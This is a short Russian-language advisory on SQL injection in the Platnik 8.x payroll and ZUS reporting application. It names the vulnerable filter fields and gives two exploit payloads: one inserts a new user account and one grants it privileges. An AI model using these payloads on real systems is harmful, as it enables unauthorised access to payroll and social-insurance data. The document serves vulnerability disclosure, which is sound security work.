Программа: Platnik 8.x

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных передаваемых через поле "filter field" во вкладке "Dziennik-Archiwum
dziennika operacji" и через поле фильтра "okres pracy" во вкладке "III-VI" во
вкладке "Documents (ZUS ZSWA)". Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.

Эксплоит:

Добавить пользователя:

<‘2010-02-28’)INSERT INTO dbo.UZYTKOWNIK VALUES(‘LOGIN’, ‘TEST’, ‘TEST’, ‘password
hash’, ‘2010-02-28 15:46:48’, null, ‘A’, null)—

Повысить привилегии пользователя:

<‘2010-02-28’)INSERT INTO dbo.UPRAWNIENIA VALUES(id_user, id_platnik)—



Оставить мнение